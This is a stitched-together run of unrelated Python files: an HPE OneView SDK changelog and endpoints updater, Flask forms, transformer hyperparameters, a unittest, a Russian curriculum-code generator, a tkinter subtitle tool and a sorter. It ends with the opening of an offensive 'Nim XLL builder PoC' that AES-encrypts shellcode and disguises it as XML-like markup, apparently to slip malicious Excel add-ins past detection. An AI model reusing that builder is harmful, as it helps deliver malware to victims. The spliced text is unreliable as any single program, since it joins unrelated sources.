dummy_file.write("\n")
dummy_file.close()
original_file = open("CHANGELOG.md", "r")
data = original_file.read()
original_file.close()
dummy_file = open("dummy_CHANGELOG.md", "r")
data2 = dummy_file.read()
dummy_file.close()
data2 += data
with open("CHANGELOG.md", "w") as final:
final.write(data2)
final.close()
os.remove("dummy_CHANGELOG.md")
print("Completed writing to CHANGELOG")
except Exception as e:
print("Exception occurred while writing to CHANGELOG {0}".format(str(e)))
resource_names = []
class WriteToEndpointsFile(object):
def __init__(self, product_table_name, executed_files, is_ansible, sdk):
self.line_nos = {}
self.res_lines = {}
self.product_table_name = product_table_name
self.all_lines = None
self.executed_files = executed_files
self.is_ansible = is_ansible
self.current_version = None
self.sdk = sdk
def write_md(self):
file = open('endpoints-support.md', 'w')
file.writelines(self.all_lines)
file.close()
def load_md(self):
file = open('endpoints-support.md')
self.all_lines = file.readlines()
def add_column(self, product_table_name):
count = 0
self.load_md()
for line in self.all_lines:
count += 1
if product_table_name in line:
break
head_line = self.all_lines[count + 1].split()
self.current_version = int(head_line[-2].split('V')[-1])
new_version = 'V' + str(self.current_version + 200)
if int(api_version) == self.current_version:
return
column_added = False
while count < len(self.all_lines):
add_col = None
line = self.all_lines[count].rstrip('\n')
if "Endpoints" in self.all_lines[count]:
add_col = line + " " + new_version + ' |\n'
elif "---------" in self.all_lines[count]:
add_col = line + ' :-----------------: |\n'
column_added = True
if add_col:
self.all_lines[count] = add_col
self.write_md()
if column_added:
break
count += 1
def get_rows(self, resource_name):
count = 0
resource_name_row_start = 0
resource_name_row_end = 0
self.load_md()
for line in self.all_lines:
count += 1
if line.startswith('| ' + resource_name):
resource_name_row_start = count
for no in range(count, len(self.all_lines)):
if self.all_lines[no].startswith('| **'):
resource_name_row_end = no
break
return resource_name_row_start, resource_name_row_end
def get_lines(self, st_no, end_no):
lines = list()
self.load_md()
for no in range(st_no, end_no):
lines.append(dict({'line_no': no, 'line': self.all_lines[no]}))
return lines
def get_old_end_points(self, st_no, end_no, webscraping_data):
lines = self.get_lines(st_no, end_no)
end_points_list = []
old_end_points = []
for ele in lines:
line = ele.get('line')
if line.startswith('|<sub>'):
ln = line.split('|')
split_module = ln[1].strip().split('<sub>')
module = split_module[-1].split('</sub>')[0]
end_points_list.append({module, ''.join((ln[2].split()))})
for end_point in end_points_list:
data_found = False
for data in webscraping_data:
if data == end_point:
data_found = True
break
if not data_found:
old_end_points.append(end_point)
return old_end_points
def validate_webscrapping_data(self, lines, end_point, str):
self.current_version = int(api_version) - 200
end_point_found = False
for ele in lines:
line_no = ele.get('line_no')
line = ele.get('line')
if line.startswith('|<sub>'):
ln = line.split('|')
ln_length = len(ln)
desired_length = int(((((self.current_version + 200) - 800) / 200) + 3))
split_module = ln[1].strip().split('<sub>')
module = split_module[-1].split('</sub>')[0]
if end_point == {module, ln[2].strip()}:
ln = line.rstrip('\n')
if (ln_length == desired_length):
add_col = ln + str
self.all_lines[line_no] = add_col
else:
pass
end_point_found = True
break
if not end_point_found:
return end_point
return
def add_checks(self, st_no, end_no, webscraping_data):
lines = self.get_lines(st_no, end_no)
old_end_points = self.get_old_end_points(st_no, end_no, webscraping_data)
for old_end_point in old_end_points:
self.validate_webscrapping_data(lines, old_end_point, ' :heavy_minus_sign: |\n')
new_end_points = []
for end_point in webscraping_data:
new_end_point = self.validate_webscrapping_data(lines, end_point, ' :white_check_mark: |\n')
if new_end_point:
new_end_points.append(new_end_point)
# below code is to add new endpoints into endpoints-support.md file and its commented, parked aside
# for end_point in new_end_points:
# if (len(list(end_point)[1]) > 5):
# add_col = '|<sub>'+list(end_point)[1]+'</sub> |'+' '+list(end_point)[0]+' '+ '| :heavy_minus_sign: '*int(((((self.current_version+200)-800)/200)-1))+'| :white_check_mark: |\n'
# else:
# add_col = '|<sub>'+list(end_point)[0]+'</sub> |'+' '+list(end_point)[1]+' '+ '| :heavy_minus_sign: '*int(((((self.current_version+200)-800)/200)-1))+'| :white_check_mark: |\n'
# line_no = lines[-1].get('line_no')
# self.all_lines[line_no] = self.all_lines[line_no]+add_col
# self.write_md()
# self.load_md()
# lines.append(dict({'line_no':line_no+1, 'line':self.all_lines[line_no+1]}))
def main(self):
i = 0
if self.is_ansible == True:
exe = modifyExecutedFiles(self.executed_files)
self.executed_files = exe
else:
pass
print("------Initiating write to endpoints file--------")
for ele in self.executed_files:
resource = list(rel_dict.keys())[list(rel_dict.values()).index(ele)]
formatted_resource_name = '**' + resource + '**'
resource_names.append(formatted_resource_name)
self.add_column(self.product_table_name)
for resource_name in resource_names:
webscraping_data = DataFromWebScraping(self.executed_files[i])
data_returned_from_web_scraping = webscraping_data.data_scraped()
st_no, end_no = self.get_rows(resource_name)
self.add_checks(st_no, end_no, data_returned_from_web_scraping)
i = i + 1
self.write_md()
print("-------Completed write to endpoints file--------")
def removeLogFiles(val):
if val == True:
print("Please check the working directory to check log files")
else:
print("---------Removing all log files---------------")
cwd = os.getcwd()
for rootDir, subdirs, filenames in os.walk(cwd):
for filename in fnmatch.filter(filenames, 'logfile*.log'):
try:
os.remove(os.path.join(rootDir, filename))
except OSError:
print("Error while deleting file")
print("---------Completed removing log files--------------")
if __name__ == '__main__':
selected_sdk = input("Please enter SDK you want to validate(python, ansible, ruby, go, terraform): ")
executed_files, is_ansible, sdk = ExecuteFiles(selected_sdk)
resources_from_textfile = LoadResourcesFromFile()
val4 = input('Please provide value as true to reside log files, else provide false: ')
if val4 == False:
removeLogFiles(val4)
else:
pass
val1 = input("Do you want to write data to CHANGELOG.md: ")
if val1 in ['y', 'yes', '']:
if len(executed_files) != len(resources_from_textfile):
val3 = input("There are few failed resources, even then do you want to write data to CHANGELOG.md: ")
if val3 in ['y', 'yes', '']:
write_obj = WriteToChangeLog(executed_files, sdk)
write_obj.write_data()
else:
print(
"Please check failed_resources list and procees with writing to CHANGELOG with successfully executed files")
else:
print("Started writing to CHANGELOG.md")
write_obj = WriteToChangeLog(executed_files, sdk)
write_obj.write_data()
print("Completed writing to CHANGELOG.md")
else:
print("Please proceed with writing to endpoints file")
val2 = input("Do you want to edit endpoints-support.md: ")
if val2 in ['y', 'yes', '']:
read_md_obj = WriteToEndpointsFile('## HPE OneView', executed_files, is_ansible, sdk)
read_md_obj.main()
else:
print("Please proceed with editing endpoints file") |
from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed
from wtforms import StringField, PasswordField, BooleanField, SubmitField, TextAreaField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, Length
from app.models import User
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class PostForm(FlaskForm):
title = StringField('Enter Post Title:', validators=[DataRequired()])
post = TextAreaField('Enter Post Body:', validators=[DataRequired()])
upload = FileField('Upload Image:', validators=[FileAllowed(['jpg'], "Must be .jpg")])
submit = SubmitField('Submit')
class EditForm(FlaskForm):
title = StringField('Post Title:', validators=[DataRequired()])
post = TextAreaField('Post Body:', validators=[DataRequired()])
submit = SubmitField('Submit')
|
# -*- coding: utf-8 -*-
#/usr/bin/python3
'''
June 2017 by kyubyong park.
[email protected].
https://www.github.com/kyubyong/transformer
maxlen = 70, batch_size = 128
源端、目标端、proj 词表共享 ???qe-brain中没有共享
优化策略:已经更改为和qe-brain中相同
'''
class QE_Hyperparams:
'''Hyperparameters'''
# data
source_train = '../parallel_data/2017/qe_data/sentence_level_en_de/train.tok.lower.src'
target_train = '../parallel_data/2017/qe_data/sentence_level_en_de/train.tok.lower.mt'
label_train = '../parallel_data/2017/qe_data/sentence_level_en_de/train.hter'
source_dev = '../parallel_data/2017/qe_data/sentence_level_en_de/dev.tok.lower.src'
target_dev = '../parallel_data/2017/qe_data/sentence_level_en_de/dev.tok.lower.mt'
label_dev = '../parallel_data/2017/qe_data/sentence_level_en_de/dev.hter'
source_test = '../parallel_data/2017/qe_data/sentence_level_en_de_test/test.2017.tok.lower.src'
target_test = '../parallel_data/2017/qe_data/sentence_level_en_de_test/test.2017.tok.lower.mt'
label_test = '../parallel_data/2017/qe_data/sentence_level_en_de_test/en-de_task1_test.2017.hter'
vocab_dir = './preprocessed_qe/'
pattern = 'en-de'
# training
batch_size = 64 # alias = N
lr = 2.0 # learning rate. learning rate is adjusted to the global step.
warmup_steps = 8000
log_dir = 'logdir' # log directory,save expert_model
num_keep_ckpts = 5
# model
maxlen = 70+2 # Maximum number of words in a sentence. alias = T.
# Feel free to increase this if you are ambitious.
#min_cnt = 20 # words whose occurred less than min_cnt are encoded as <UNK>.
vocab_size = 30000 # src and tgt
hidden_units = 512 # alias = C
num_blocks = 2 # number of encoder/decoder blocks
num_heads = 8
dropout_rate = 0.1
sinusoid = True # If True, use sinusoid. If false, positional embedding.
# qe params
model_dir = './modeldir/' # dir of qe_model
num_train_steps = 75000
steps_per_stats = 10 # Once in a while, we print statistics.
steps_per_save = 50
fixed_exp = False # fixed expert weights or not
patience = 5
|
""" conf test cases """
import unittest
from xcmd.conf import Conf, ConfVar
class ConfTestCase(unittest.TestCase):
""" test conf code """
def setUp(self):
""" nothing for now """
pass
def test_conf(self):
""" basic tests """
conf = Conf(
ConfVar(
'foo',
'A foo variable',
10
),
ConfVar(
'bar',
'A bar variable',
'some value'
)
)
self.assertEqual(conf.get_int('foo'), 10)
self.assertEqual(conf.get_str('bar'), 'some value')
self.assertEqual(len(list(conf.get_all())), 2)
|
import pandas as pd
import numpy as np
import re
import time
import sys
degree = {
"06": ["Академический бакалавр", "Специалист"],
"07": ["Магистр"]
}
uni_module = {
"0": "универсальный модуль",
"1": "модуль философия мышление",
"2": "модуль цифровая культура",
"3": "модуль креативные технологии",
"4": "модуль предпринимательская культура",
"5": "модуль soft skills",
"6": "огнп",
"7": "физическая культура",
"8": "цифровая культура в профессиональной деятельности",
"9": "общеуниверситетские дисциплины мировоззренческого модуля",
"10": "иностранный язык",
"11": "элективная дисциплина soft skills",
"12": "факультативные дисциплины"
}
ognp_module = {
"0": "математический модуль",
"1": "естественнонаучный модуль",
"2": "общепрофессиональный модуль",
"3": "элективный модуль по группе направлений",
"4": "межпрофильный модуль факультета",
"5": "профильный профессиональный модуль",
# "6": "специализац",
"7": "факультетский модуль",
"8": "цифровая культура в предметной области мегафакультета",
"9": "профессиональный модуль",
"10": "практики",
"11": "гиа"
}
ognp_codes = {
"1": ["12.03.04", "14.03.01", "16.03.03", "18.03.02", "19.03.01", "19.03.02", "19.03.03", "16.04.03", "18.04.02", "19.04.01", "19.04.02", "19.04.03", "20.04.01", "27.04.01"],
"2": ["12.03.01", "13.03.02", "15.03.04", "15.03.06", "24.03.02", "27.03.04", "11.04.03", "12.04.01", "13.04.02", "15.04.02", "15.04.04", "15.04.06", "23.04.03", "24.04.01", "24.04.02", "27.04.03"],
"3": ["09.03.01", "09.03.04", "10.03.01", "11.03.03", "23.03.03", "44.03.04", "09.04.01", "09.04.04", "10.04.01", "27.04.04"],
"4": ["27.03.05", "38.03.05", "27.04.02", "27.04.05", "27.04.08", "38.04.01", "38.04.05"],
"5": ["01.03.02", "09.03.02", "01.04.02", "02.04.03", "09.04.02"],
"6": ["09.03.03", "11.03.02", "45.03.04", "07.04.04", "09.04.03", "11.04.02", "27.04.07", "45.04.04"],
"7": ["12.03.02", "12.03.03", "12.03.05", "12.05.01", "16.03.01", "12.04.02", "12.04.03", "12.04.04", "12.04.05", "16.04.01"]
}
# remove multiple spaces and punctuation
def cleanText(text):
cleaned = re.sub(r'[^\w\s]', ' ', text)
cleaned = re.sub(' +', ' ', cleaned)
cleaned = cleaned.replace('\xa0', '')
cleaned = cleaned.replace('\t', '')
cleaned = cleaned.strip()
return cleaned
# calculate positions 1-3
def getPos123(xlsx_degree, xlsx_sf_code, xlsx_sf_name, xlsx_comp, line=""):
list_of_degrees = [d for d in degree if xlsx_degree in degree[d]]
if not list_of_degrees: sys.exit("Неизвестный уровень образования в %sзаписи." % line)
else: p1 = list_of_degrees[0]
uni = [u for u in uni_module if re.match(uni_module[u], xlsx_comp, flags=re.IGNORECASE)]
module = ["5" if re.match("модуль [0-9]", xlsx_comp, flags=re.IGNORECASE) else
"6" if re.search("специализац", xlsx_comp, flags=re.IGNORECASE) else
p if re.match(ognp_module[p], xlsx_comp, flags=re.IGNORECASE) else
np.nan for p in ognp_module]
module = [m for m in module if str(m) != 'nan']
if not uni and not module: sys.exit("Неизвестный модуль в %sзаписи." % line)
if uni: return p1 + "." + "0" + "." + uni[0] + "."
if module:
ognp_num = ["3" if xlsx_sf_name == "Цифровые системы управления" else
"2" if xlsx_sf_name == "Системы управления движением и навигации" else
"1" if xlsx_sf_name == "Цифровые геотехнологии" else
num if xlsx_sf_code in ognp_codes[num] else
np.nan for num in ognp_codes]
ognp_num = [p for p in ognp_num if str(p) != 'nan']
if not ognp_num:
print(xlsx_degree, xlsx_sf_code, xlsx_sf_name)
sys.exit("Неизвестный шифр направления подготовки в %sзаписи." % line)
else: return p1 + "." + ognp_num[0] + "." + module[0] + "."
# find max 4th value
def getMax4(dis_rep):
list_of_4 = [int(dis_rep["DIS_CODE"][d].split(".")[3]) for d in dis_rep.index.values]
if list_of_4: return max(list_of_4)
else: return -1
def totalUnitInfo(data, sf_name, subj, comp, subj_code, cycle, year):
credit_units = [0 for i in range(0, 12)]
units = data.loc[(data["SUBFIELDNAME"] == sf_name) & (data["SUBJECT"] == subj) & (data["COMPONENT"] == comp) & (data["SUBJECT_CODE"] == subj_code) & (data["CYCLE"] == cycle) & (data["YEAR"] == year)]
try:
for u in units.index.values:
if pd.isna(units["CREDITS"][u]) or units["CREDITS"][u] == 0: credit_units[int(units["SEMESTER"][u]) - 1] = "-"
elif units["SEMESTER"][u] == ".": credit_units[11] = int(units["CREDITS"][u])
else: credit_units[int(units["SEMESTER"][u]) - 1] = int(units["CREDITS"][u])
except:
pass
return ",".join(map(str, credit_units))
def numUnitsCredits(units_credits):
units = [u for u in units_credits.split(",") if u != "0"]
int_creds = [0 if u == "-" else int(u) for u in units]
return ",".join(map(str, [len(units), sum(int_creds)]))
def getPos4(rep, sem_xlsx, dis_code, subj, sf_name):
if subj not in rep["SUBJECT"].to_list():
return str(getMax4(rep) + 1)
else:
rep1 = rep.loc[rep["SUBJECT"] == subj]
new_sem_info = rep1["SEM_INFO"].apply(numUnitsCredits).to_list()
rep3 = rep1.assign(UNITS_CREDITS=new_sem_info)
if numUnitsCredits(sem_xlsx) not in new_sem_info:
return str(getMax4(rep) + 1)
else:
rep2 = rep3.loc[rep3["UNITS_CREDITS"] == numUnitsCredits(sem_xlsx)].reset_index(drop=True)
rows = len(rep2["DIS_CODE"])
count = 0
for p in rep2.index.values:
if (rep2["SUBFIELDNAME"][p] != sf_name) and (dis_code.split(".")[2] in ["10", "11"]) and (dis_code.split(".")[1] != "0"):
count += 1
if count != rows: continue
else:
return str(getMax4(rep) + 1)
else:
return str(rep2["DIS_CODE"][p].split(".")[3])
# workaround for 01.04.02 Разработка программного обеспечения / Software Engineering
def softwareEngineering(rep, sem_xlsx, dis_code, subj):
p12 = dis_code[:-2]
p3 = dis_code.split(".")[2]
fin_rep = rep.loc[rep["DIS_CODE"].str.match(p12 + p3)]
if subj not in rep["SUBJECT"].to_list(): return p3 + "." + str(getMax4(fin_rep) + 1)
else:
rep1 = rep.loc[rep["SUBJECT"] == subj]
new_sem_info = rep1["SEM_INFO"].apply(numUnitsCredits).to_list()
rep2 = rep1.assign(UNITS_CREDITS=new_sem_info)
if numUnitsCredits(sem_xlsx) not in new_sem_info: return p3 + "." + str(getMax4(fin_rep) + 1)
else:
rep3 = rep2.loc[rep2["UNITS_CREDITS"] == numUnitsCredits(sem_xlsx)].reset_index(drop=True)
rep3["DIS_CODE"] = rep3.groupby(["SUBJECT", "UNITS_CREDITS"])["DIS_CODE"].transform("first")
return ".".join(rep3["DIS_CODE"][0].split(".")[-2:])
# workaround for элективный модуль по группе направлений
def electiveModuleBachelor(rep, sem_xlsx, dis_code, subj):
p23 = ".".join(dis_code.split(".")[1:])
fin_rep = rep.loc[rep["DIS_CODE"].str.match(dis_code)]
if subj not in rep["SUBJECT"].to_list():
return p23 + str(getMax4(fin_rep) + 1)
else:
rep1 = rep.loc[rep["SUBJECT"] == subj]
new_sem_info = rep1["SEM_INFO"].apply(numUnitsCredits).to_list()
rep2 = rep1.assign(UNITS_CREDITS=new_sem_info)
if numUnitsCredits(sem_xlsx) not in new_sem_info:
return p23 + str(getMax4(fin_rep) + 1)
else:
rep3 = rep2.loc[rep2["UNITS_CREDITS"] == numUnitsCredits(sem_xlsx)].reset_index(drop=True)
rep3["DIS_CODE"] = rep3.groupby(["SUBJECT", "UNITS_CREDITS"])["DIS_CODE"].transform("first")
return ".".join(rep3["DIS_CODE"][0].split(".")[1:])
def getPos5(data, new_sys_df):
if new_sys_df == 1:
data["VERSION"] = data.groupby(["DIS_CODE"])["VERSION"].transform("first")
if new_sys_df == 0:
data["VERSION"] = data.groupby(["DIS_CODE"])["VERSION"].transform("min")
return data
# create sys_df if empty or does not exist
def create_sys_df():
cols = ["SUBFIELDCODE", "SUBFIELDNAME", "YEAR", "DEGREE", "SUBJECT_CODE", "SUBJECT", "COMPONENT", "SEM_INFO", "DIS_CODE", "VERSION"]
sys_df = pd.DataFrame(columns=cols)
return sys_df
def append_sys_df(sys_df, sf_code, sf_name, year, subj_degree, subj_code, subj, comp, sem_info, dis_code, ver):
to_append = [sf_code, sf_name, year, subj_degree, subj_code, subj, comp, sem_info, dis_code, ver]
new_row = pd.Series(to_append, index=sys_df.columns)
sys_df = sys_df.append(new_row, ignore_index=True)
return sys_df
# generate unique code for each discipline in excel file
def generate_df_w_unique_code(in_df, sys_df=None):
in_df = in_df.sort_values(by=["YEAR", "SUBFIELDCODE", "SUBFIELDNAME"]).reset_index(drop=True)
out_df = in_df.copy()
if (sys_df is None) or sys_df.empty:
new_sys_df = 0
sys_df = create_sys_df()
else:
new_sys_df = 1
in_df["COMPONENT"] = in_df["COMPONENT"].apply(cleanText)
in_df["SUBJECT"] = in_df["SUBJECT"].apply(cleanText)
in_df["YEAR"] = in_df["YEAR"].apply(str)
sys_df["YEAR"] = sys_df["YEAR"].apply(str)
in_df["SEM_INFO"] = "default"
for i in in_df.index.values:
in_df.loc[i, "SEM_INFO"] = totalUnitInfo(in_df, in_df["SUBFIELDNAME"][i], in_df["SUBJECT"][i], in_df["COMPONENT"][i], in_df["SUBJECT_CODE"][i], in_df["CYCLE"][i], in_df["YEAR"][i])
in_df.loc[i, "DIS_CODE"] = getPos123(in_df["DEGREE"][i], in_df["SUBFIELDCODE"][i], in_df["SUBFIELDNAME"][i], in_df["COMPONENT"][i], str(i + 2) + " ")
if (in_df["SUBFIELDNAME"][i] == "Разработка программного обеспечения / Software Engineering") and (in_df["DIS_CODE"][i].split(".")[2] in ["5", "6"]):
p34 = softwareEngineering(sys_df.loc[sys_df["DIS_CODE"].str.match(in_df.loc[i, "DIS_CODE"][:-2])], in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["SUBJECT"][i])
in_df.loc[i, "DIS_CODE"] = in_df["DIS_CODE"][i][:-2] + str(p34)
elif (in_df["DIS_CODE"][i].split(".")[0] == "06") and (in_df["DIS_CODE"][i].split(".")[1] != "0") and (in_df["DIS_CODE"][i].split(".")[2] == "3"):
p234 = electiveModuleBachelor(sys_df.loc[sys_df["DIS_CODE"].str.match("06\.[1-7]\.3\.")], in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["SUBJECT"][i])
in_df.loc[i, "DIS_CODE"] = in_df["DIS_CODE"][i][:3] + str(p234)
else:
p4 = getPos4(sys_df.loc[sys_df["DIS_CODE"].str.match(in_df.loc[i, "DIS_CODE"])],
in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["SUBJECT"][i],
in_df["SUBFIELDNAME"][i])
in_df.loc[i, "DIS_CODE"] = in_df["DIS_CODE"][i] + str(p4)
sys_df = append_sys_df(sys_df, in_df["SUBFIELDCODE"][i], in_df["SUBFIELDNAME"][i], in_df["YEAR"][i], in_df["DEGREE"][i],
in_df["SUBJECT_CODE"][i], in_df["SUBJECT"][i], in_df["COMPONENT"][i], in_df.loc[i, "SEM_INFO"], in_df["DIS_CODE"][i], in_df["YEAR"][i][-2:]).drop_duplicates().reset_index(drop=True)
sys_df = getPos5(sys_df, new_sys_df).drop_duplicates().reset_index(drop=True)
to_merge = sys_df[["DIS_CODE", "VERSION"]].copy()
in_df_ver = pd.merge(in_df, to_merge, how="left", on="DIS_CODE", left_index=True).drop_duplicates().reset_index(drop=True)
out_df["DIS_CODE"] = in_df_ver["DIS_CODE"] + "." + in_df_ver["VERSION"].apply(str)
return out_df, sys_df
# generate unique code for a discipline that already exists
def generate_single_unique_code(sf_code, sf_name, year, subj_degree, subj_code, subj, comp, credit_units, sys_df=None):
if (sys_df is None) or sys_df.empty:
new_sys_df = 0
sys_df = create_sys_df()
else:
new_sys_df = 1
comp = cleanText(comp)
subj = cleanText(subj)
sys_df["YEAR"] = sys_df["YEAR"].apply(str)
year = str(year)
dis_code = getPos123(subj_degree, sf_code, sf_name, comp)
sem = ",".join(map(str, credit_units))
if (sf_name == "Разработка программного обеспечения / Software Engineering") and (dis_code.split(".")[2] in ["5", "6"]):
p34 = softwareEngineering(sys_df.loc[sys_df["DIS_CODE"].str.match(dis_code[:-2])], sem, dis_code, subj)
dis_code = dis_code[:-2] + str(p34)
elif (dis_code.split(".")[0] == "06") and (dis_code.split(".")[1] != "0") and (dis_code.split(".")[2] == "3"):
p234 = electiveModuleBachelor(sys_df.loc[sys_df["DIS_CODE"].str.match("06\.[1-7]\.3\.")], sem, dis_code, subj)
dis_code = dis_code[:3] + str(p234)
else:
p4 = getPos4(sys_df.loc[sys_df["DIS_CODE"].str.match(dis_code)], sem, dis_code, subj, sf_name)
dis_code = dis_code + str(p4)
sys_df = append_sys_df(sys_df, sf_code, sf_name, year, subj_degree, subj_code, subj, comp, sem, dis_code, year[-2:])
sys_df = getPos5(sys_df, new_sys_df)
dis_code = sys_df.iloc[-1, sys_df.columns.get_loc("DIS_CODE")] + "." + str(sys_df.iloc[-1, sys_df.columns.get_loc("VERSION")])
sys_df = sys_df.drop_duplicates().reset_index(drop=True)
return dis_code, sys_df
# Example
#start_time = time.time()
# generate codes for an excel file
"""
df1 = pd.read_excel("source_files/01.03.02.xlsx")
discipline_rep = pd.read_excel("source_files/discipline_bank.xlsx")
#processed_data, db = generate_df_w_unique_code(df1, discipline_rep)
processed_data, db = generate_df_w_unique_code(df1)
processed_data.to_excel("source_files/new_disciplines_test_bachelor_01.03.02.xlsx", index=False)
db.to_excel("source_files/discipline_bank.xlsx", index=False)
"""
"""
discipline_rep = pd.read_excel("source_files/discipline_bank.xlsx")
discipline_code, db = generate_single_unique_code("19.03.01",
"Биотехнология",
2020,
"Академический бакалавр",
32,
"Аналитическая химия и физико-химические методы анализа",
"Элективный модуль по группе направлений",
[0, 0, 3, 0, 0, 0, 0, 0, 0, 0, 0, 0],
discipline_rep)
print(discipline_code)
db.to_excel("source_files/discipline_bank.xlsx", index=False)
"""
#print("--- %s seconds ---" % (time.time() - start_time))
|
'''
Created on Jan 30, 2016
@author: Ziv
'''
import sys
import tkinter as tk
import tkinter.constants
import tkinter.filedialog
from tkinter.scrolledtext import ScrolledText
from srtFix.processFile import processFile
from getArgs import fixParams
from srtFix.processFile import calculateOffset
class TkFileDialogExample(tk.Frame):
def __init__(self, root):
tk.Frame.__init__(self, root)
# # input field example
# self.pack()
#
# self.entrythingy = tk.Entry(self)
# self.entrythingy.pack()
# # here is the application variable
# self.contents = tk.StringVar()
# # set it to some value
# self.contents.set("this is a variable")
# # tell the entry widget to watch this variable
# self.entrythingy["textvariable"] = self.contents
#
# # and here we get a callback when the user hits return.
# # we will have the program print out the value of the
# # application variable when the user hits return
# self.entrythingy.bind('<Key-Return>',
# self.print_contents)
#Test widget
self.log=ScrolledText(self,width=70)
'''init filename to empty string'''
self.filename=''
# options for buttons
button_opt = {'fill': tk.constants.BOTH, 'padx': 5, 'pady': 5}
#direction
self.dirVal='movie-after'
self.dirButton = tk.Button(self, text=self.dirVal,
command=self.dirToggle)
# define buttons
tk.Label(self, text='Start Diff',anchor=tk.E).grid(row=0,column=0,sticky=tk.E+tk.W)
self.startDiff=tk.StringVar()
self.startDiff.set('')
tk.Entry(self, textvariable=self.startDiff).grid(row=0,column=1,sticky=tk.W+tk.E)
tk.Label(self, text='End Diff',anchor=tk.E).grid(row=1,column=0,sticky=tk.E+tk.W)
self.endDiff=tk.StringVar()
self.endDiff.set('')
tk.Entry(self, textvariable=self.endDiff).grid(row=1,column=1,sticky=tk.W+tk.E)
self.dirButton.grid(row=0,column=2,sticky=tk.W+tk.E)
tk.Button(self, text='Choose file', command=self.askfilename).grid(row=1,column=2,sticky=tk.W+tk.E)
# Translate
tk.Button(self, text='Translate',command=self.translate).grid(row=2,column=0,sticky=tk.E+tk.W)
tk.Button(self, text='Go', command=self.go).grid(row=0,column=3, rowspan=2,sticky=tk.W+tk.S+tk.E+tk.N)
self.log.grid(row=3,column=0,columnspan=4)
# tk.Button(self, text='askopenfile', command=self.askopenfile).pack(**button_opt)
# tk.Button(self, text='asksaveasfile', command=self.asksaveasfile).pack(**button_opt)
# tk.Button(self, text='asksaveasfilename', command=self.asksaveasfilename).pack(**button_opt)
# tk.Button(self, text='askdirectory', command=self.askdirectory).pack(**button_opt)
# define options for opening or saving a file
self.file_opt = options = {}
options['defaultextension'] = '.srt'
options['filetypes'] = [('srt files', '.srt'),('all files', '.*')]
options['initialdir'] = 'C:\\Data\\--Movies'
#options['initialfile'] = 'myfile.txt'
options['parent'] = root
options['title'] = 'srtFix - Choose file'
# This is only available on the Macintosh, and only when Navigation Services are installed.
# options['message'] = 'message'
# if you use the multiple file version of the module functions this option is set automatically.
# options['multiple'] = 1
# defining options for opening a directory
self.dir_opt = options = {}
options['parent'] = root
options['title'] = 'This is a title'
options['mustexist'] = True
options['initialdir'] = 'C:\\'
def dirToggle(self):
self.dirVal = 'movie-before' if self.dirVal == 'movie-after' else 'movie-after'
self.dirButton['text']=self.dirVal
def translate(self):
self.toScreenLog('translate pressed')
def toScreenLog(self, s):
self.log.insert(tk.END, '\n'+s)
def print_contents(self, event):
print("hi. contents of entry is now ---->",
self.contents.get())
print("startDiff:", self.startDiff.get())
def go(self):
try:
print ("startDiff:{0},endDiff:{1},dir:{2},file:{3}".format(self.startDiff.get(),self.endDiff.get(),self.dirVal,self.filename))
#pack paramaters and process file
sd=float(self.startDiff.get())
#r=parse('{n:d}',self.endDiff.get())
ed= None if None == self.endDiff.get() else float(self.endDiff.get())
params=fixParams(f=self.filename,s=sd,e=ed, d=self.dirVal)
self.toScreenLog("startDiff:{0},endDiff:{1},dir:{2},file:{3}".format(params.startDiff,params.endDiff,params.direction,params.fname))
calculateOffset(params)
#self.toScreenLog("movie len:{0},out file name:{1}".format(params.movieLen,params.outfname))
processFile(params)
self.toScreenLog("Done. Output file:%s" % params.outfname)
except ValueError:
self.toScreenLog('Enter a number in the Diff fields')
except IOError:
e=sys.exc_info()[0]
self.toScreenLog(e)
print('Try again')
except:
e=sys.exc_info()[0]
print("Unexpected error:", e)
raise
def askopenfile(self):
"""Returns an opened file in read mode."""
return tk.filedialog.askopenfile(mode='r', **self.file_opt)
def askfilename(self):
"""Returns an opened file in read mode.
This time the dialog just returns a filename and the file is opened by your own code.
"""
# get filename
self.filename = tk.filedialog.askopenfilename(**self.file_opt)
self.toScreenLog(self.filename)
def asksaveasfile(self):
"""Returns an opened file in write mode."""
return tk.filedialog.asksaveasfile(mode='w', **self.file_opt)
def asksaveasfilename(self):
"""Returns an opened file in write mode.
This time the dialog just returns a filename and the file is opened by your own code.
"""
# get filename
filename = tk.filedialog.asksaveasfilename(**self.file_opt)
# open file on your own
if filename:
return open(filename, 'w')
def askdirectory(self):
"""Returns a selected directoryname."""
return tk.filedialog.askdirectory(**self.dir_opt)
if __name__ == '__main__':
root = tk.Tk()
TkFileDialogExample(root).grid()
root.mainloop()
|
import sys
N, M = sys.stdin.readline().split()
AandB = sys.stdin.read().split()
print(' '.join(sorted(AandB, key=int)))
|
import argparse
import base64
import os
import random
import shutil
from binascii import hexlify
from Crypto.Cipher import AES
from Crypto.Util import Counter
banner = """
_ _
| | |
_ _ _ _ ____ ____| | | ____
( \\ / ) | | |/ ___) _ ) | |/ _ |
) X (| |_| | | ( (/ /| | ( ( | |
(_/ \\_)\\__ |_| \\____)_|_|\\_||_|
(____/ Nim XLL builder PoC v0.2.1
"""
print(banner)
def encode_shellcode(sc_bytes):
STATE_OPEN = "<"
STATE_CLOSE = ">"
STATE_CLOSETAG = "/>"
STATE_EQUALS = " = "
STATE_PAYLOADTAG = "x"
STATE_PAYLOADBODY = "y"
STATE_TAGSPACE = "STATE_TAGSPACE"
STATE_BODYSPACE = "STATE_BODYSPACE"
STATE_CRLF = "\n"
transitions = {
STATE_OPEN : { STATE_PAYLOADTAG: 1 },
STATE_CLOSE : { STATE_PAYLOADBODY: 1 },
STATE_CLOSETAG : { STATE_OPEN: 1 },
STATE_EQUALS : { STATE_PAYLOADTAG: 1 },
STATE_PAYLOADTAG : {STATE_PAYLOADTAG: 0.5, STATE_CLOSETAG: 0.15, STATE_CLOSE: 0.15, STATE_TAGSPACE: 0.1, STATE_EQUALS: 0.1},
STATE_PAYLOADBODY : {STATE_PAYLOADBODY: 0.775, STATE_BODYSPACE: 0.1, STATE_CRLF: 0.025, STATE_OPEN: 0.1},
STATE_TAGSPACE : { STATE_PAYLOADTAG: 1 },
STATE_BODYSPACE : { STATE_PAYLOADBODY: 1 },
